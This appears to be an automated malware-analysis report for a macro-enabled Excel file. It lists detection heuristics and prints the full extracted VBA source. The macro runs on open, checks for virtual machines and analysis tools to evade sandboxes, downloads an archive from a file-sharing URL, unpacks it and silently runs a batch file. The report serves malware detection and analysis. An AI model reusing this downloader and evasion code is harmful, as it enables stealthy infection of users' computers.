MALICIOUS
570
Risk Score
Heuristics 14
-
VBA project inside OOXML medium 11 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
RarIt = Shell(WinRarPath & "WinRar.exe e " & Source & " " & Desti, vbNormalFocus) -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set oShell = CreateObject("Wscript.Shell") -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Set oShell = CreateObject("Wscript.Shell") -
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Private Sub auto_open() -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
oStream.Write WinHttpReq.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set ws = GetObject("winmgmts:\\.\root\cimv2") -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
strArgs = "cmd /c D:\teste\teste.bat" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Private Sub auto_open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://file.io/ET2uPm1mbPS6 Referenced by macro
- https://file.io/ET2uPm1mbPS6�Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12523 bytes |
SHA-256: 487d85cd94a5c48a59301109a16a87b826b8c2810c4892703c5a2df12b68d4ba |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Plan1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Plan2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Plan3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Módulo1"
Attribute VB_Name = "Módulo2"
Private Sub auto_open()
On Error Resume Next
MsgBox "lol"
checkRecentDocs
checkNbrOfTask
checkTasks
checkZoneIdentifier
checkPartOfDomain
checkBios
checkPnP
checkUsername
checkFilenameHash
checkFilenameBad
checkPreciseFileName
checkCores
checkAppCount
checkApps
mark
Macro2
End Sub
Sub downloadFile(url As String, filePath As String)
Dim WinHttpReq As Object, attempts As Integer
attempts = 3
On Error GoTo TryAgain
TryAgain:
attempts = attempts - 1
Err.Clear
If attempts > 0 Then
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", url, False
WinHttpReq.Send
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile filePath, 2 ' 1 = no overwrite, 2 = overwrite
oStream.Close
End If
End If
End Sub
Sub downloadFile_(url As String, fileOutPath As String)
Dim WinHttpReq As Object, oStream As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", url, False
WinHttpReq.Send
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile fileOutPath, 1 ' 1 = no overwrite, 2 = overwrite
oStream.Close
End If
End Sub
Private Sub XORIt(ByRef Text As String, ByRef key As String)
Dim l As Long
Dim lonLenKey As Long, lonKeyPos As Long
lonLenKey = Len(key)
For l = 1 To Len(Text)
lonKeyPos = lonKeyPos + 1
If lonKeyPos > lonLenKey Then lonKeyPos = 1
Mid$(Text, l, 1) = Chr$(Asc(Mid$(Text, l, 1)) Xor Asc(Mid$(key, lonKeyPos, 1)))
Next l
End Sub
Sub Macro2()
Dim arr() As Integer
For iCount = 1 To 3000
ReDim Preserve arr(iCount)
arr(iCount) = iCount
Debug.Print arr(iCount)
Next iCount
For Each element In arr
If element = 2500 Then
Dim path As String
Dim path_ As String
MkDir "D:\teste"
downloadFile_ "https://file.io/ET2uPm1mbPS6", "D:\teste\jjj.rar"
UnWinRarIt
Set oShell = CreateObject("Wscript.Shell")
Dim strArgs
strArgs = "cmd /c D:\teste\teste.bat"
oShell.Run strArgs, 0, False
MsgBox "CPF'S LIVE:"
End If
Next
End Sub
Sub UnWinRarIt()
Dim WinRarPath As String 'WinRar.exe location
Dim RarIt As String 'Command line instruction
Dim SourceDir As String 'The source directory
Dim SourceRarFile As String 'The source file
Dim Source As String 'The Source Rar path (sourceDir+SourceRarfile)
Dim Desti As String 'The destination path of unRar
WinRarPath = "C:\Program Files\WinRar\"
SourceDir = "D:\teste"
SourceRarFile = "jjj.rar"
Source = SourceDir & "\" & SourceRarFile
Desti = "D:\teste\"
RarIt = Shell(WinRarPath & "WinRar.exe e " & Source & " " & Desti, vbNormalFocus)
End Sub
Public Sub checkApps()
printMsg "[*] WordBasic.AppGetNames ..."
d = False
tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
Set ws = GetObject("winmgmts:\\.\root\cimv2")
Dim names() As String
ReDim names(WordBasic.AppCount())
WordBasic.AppGetNames names
For Each n In names
For Each tn In tns
If InStr(LCase(n), tn) > 0 Then
d = True
End If
Next
Next
If d Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkAppCount()
printMsg "[*] Checking WordBasic.AppCount() ..."
If WordBasic.AppCount() < 50 Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkPreciseFileName()
printMsg "[*] Checking Precise Filename ..."
badName = False
If ActiveDocument.Name <> "Pafish.docm" Then
badName = True
End If
If badName Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkFilenameHash()
printMsg "[*] Checking Filename Hashname ..."
hexchars = "0123456789abcdef"
c = 0
For i = 1 To Len(ThisDocument.Name)
s = Mid(LCase(ThisDocument.Name), i, 1)
If InStr(s, hexchars) > 0 Then
c = c + 1
End If
Next
If c >= (Len(ThisDocument.Name) - 5) Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkFilenameBad()
printMsg "[*] Checking Bad Filename ..."
badName = False
badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
For Each n In badNames
If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
badName = True
End If
Next
If badName Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkTasks()
printMsg "[*] Checking Application.Tasks.Name ..."
badTask = False
badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
For Each Task In Application.Tasks
For Each badTaskName In badTaskNames
If InStr(LCase(Task.Name), badTaskName) > 0 Then
badTask = True
End If
Next
Next
If badTask Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkCores()
printMsg "[*] Checking Win32_Processor.NumberOfCores ..."
badCores = 0
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
badCores = True
End If
Next
If badCores Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkBios()
printMsg "[*] Checking Win32_Bios.SMBIOSBIOSVersion & SerialNumber ..."
badBios = False
badBiosNames = Array("virtualbox", "vmware", "kvm")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
For Each objItem In colItems
For Each badName In badBiosNames
If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
badBios = True
End If
If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
badBios = True
End If
Next
Next
If badBios Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkPnP()
printMsg "[*] Checking Win32_PnPEntity.DeviceId ..."
badPNP = False
badPNPNames = Array("VEN_80EE", "VEN_15AD")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
For Each objItem In colItems
For Each badName In badPNPNames
If InStr(LCase(objItem.DeviceId), badName) > 0 Then
badPNP = True
End If
Next
Next
If badPNP Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkUsername()
printMsg "[*] Checking Win32_ComputerSystem.Username ..."
badUsername = False
badUsernames = Array("admin", "malfind", "sandbox", "test")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
For Each badName In badUsernames
If InStr(LCase(objItem.UserName), badName) > 0 Then
badUsername = True
End If
Next
Next
If badUsername Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkPartOfDomain()
printMsg "[*] Checking Win32_ComputerSystem.PartOfDomain ..."
partOfDomain = False
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
partOfDomain = True
End If
Next
If partOfDomain Then
printMsg "OK"
Else
printMsg "DETECTED"
End If
End Sub
Public Sub checkZoneIdentifier()
printMsg "[*] Checking Zone.Identifier ..."
If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
printMsg "OK"
Else
printMsg "DETECTED"
End If
End Sub
Public Sub checkNbrOfTask()
printMsg "[*] Checking Application.Tasks.Count ..."
If Application.Tasks.Count < 3 Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkRecentDocs()
printMsg "[*] Checking Application.RecentFiles.Count ..."
If Application.RecentFiles.Count < 3 Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Function printMsg(msg)
ActiveDocument.Range.Text = ActiveDocument.Range.Text & msg
Set objFSO = CreateObject("Scripting.FileSystemObject")
outFile = "pafish.log"
Set objFile = objFSO.CreateTextFile(outFile, True)
objFile.Write ActiveDocument.Range.Text & msg
objFile.Close
End Function
Public Sub mark()
Text = ActiveDocument.Range.Text
toks = Split(Text, vbCr)
c = 0
For Each tok In toks
l = Len(tok)
If tok = "OK" Then
ActiveDocument.Range(c, c + l).Font.Color = vbGreen
End If
If tok = "DETECTED" Then
ActiveDocument.Range(c, c + l).Font.Color = vbRed
End If
c = c + l + 1
Next
ActiveDocument.Range.ParagraphFormat.SpaceBefore = 0
ActiveDocument.Range.ParagraphFormat.SpaceAfter = 0
ActiveDocument.Range.Font.Size = 8
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 77312 bytes |
SHA-256: d170504c88e57303a88f6f3d343bb8f543d9bbdbf02f25c7ed86e3b7693e4c73 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.